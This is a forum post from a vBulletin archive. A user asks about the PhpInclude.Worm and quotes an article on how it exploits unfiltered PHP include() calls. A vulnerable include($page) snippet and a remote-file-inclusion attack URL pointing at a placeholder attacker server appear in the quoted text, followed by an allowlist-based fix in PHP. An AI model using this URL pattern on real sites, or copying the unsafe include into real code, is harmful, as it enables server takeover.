The Archive of Official vBulletin Modifications Site. It is not a VB3 engine, just a parsed copy!
#1
PHP worm?
I was informed by my host there is a PHP worm out there... do you have an update, or is vBulletin already secure for it? I run version 2.3.0.
This is a copy of the email I got. Any help would be appreciated.

There is a worm using Google to look for insecure PHP pages. The worm will exploit the PHP pages and take over your site, ranging from web site defacement to deletion of files. The problem relates to insecure PHP coding using the following items:

include()
require()
mail()
upload

---------

From the article:

The new worm PhpInclude.Worm is currently being propagated on the Internet; it attacks any unprotected dynamic page.

[ This worm is detected by certain antivirus products as being an alternative of Santy. We estimate that this worm is completely different from the Santy family; we thus decided to allot it the generic alias "PhpInclude.Worm". ]

Contrary to Santy, PhpInclude.Worm does not exploit the phpBB vulnerabilities; it exploits a broader palette of faults known as "programming" faults. It seeks (via Google/Yahoo/AOL) Web servers whose PHP pages use the functions "include()" and "require()" in an unprotected way.

How?

These functions are normally used by programmers in order to include Web pages specified in arguments. Unfortunately, not checking these arguments can allow the inclusion and the execution of external files, and thus the compromising of the Web server.

Example: vulnerable.php

    if(isset($page))
    {
        include($page);
    }

-----------------------------------------------

The page above does not correctly filter the variable $page; it thus allows the inclusion and then the execution of distant arbitrary scripts:

vulnerable.php?page=http://server_pirate/scriptmalicieux?cmd=commandes_malicieuses

PhpInclude.Worm thus seeks pages of the type "*php?*=", then tries to insert various orders there, allowing the installation of IRC robots and the constitution of an army of zombie machines.
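The vulnerable.php in the quoted email passes a request-controlled $page straight to include(). The block below is an added example, not part of the original post or the quoted article, showing a hardened form in which the request value is only a key into a fixed server-side allowlist. PAGES, resolve_page() and the demo directory are hypothetical names, and the sample inputs are constructed.

```php
<?php
// Added example (not from the original post): allowlist-based page
// resolution to replace include($page). All names are hypothetical.

// Public page keys mapped to files that ship with the application.
const PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

/**
 * Return the absolute path to include for a requested page key,
 * or null when the request must be rejected.
 */
function resolve_page($requested, string $baseDir): ?string
{
    // Request parameters can arrive as arrays (page[]=x); accept strings only,
    // and only strings that are keys of the allowlist.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    // The path is built from server-side constants, never from the input.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    // realpath() returns false for a missing file; also confirm the
    // resolved file still sits inside the base directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a throwaway pages directory so the script runs offline.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_demo_' . getmypid();
@mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'home.php', '<?php echo "home";');

// Constructed inputs: a valid key, the remote-URL form from the email,
// an allowlisted key whose file is missing, and an array parameter.
$samples = ['home', 'http://server_pirate/scriptmalicieux', 'contact', ['x']];
foreach ($samples as $s) {
    $path = resolve_page($s, $dir);
    echo json_encode($s, JSON_UNESCAPED_SLASHES), ' => ',
        $path === null ? "rejected\n" : "include $path\n";
}
```

Only the first sample resolves to a path; the other three are rejected before any include() could run.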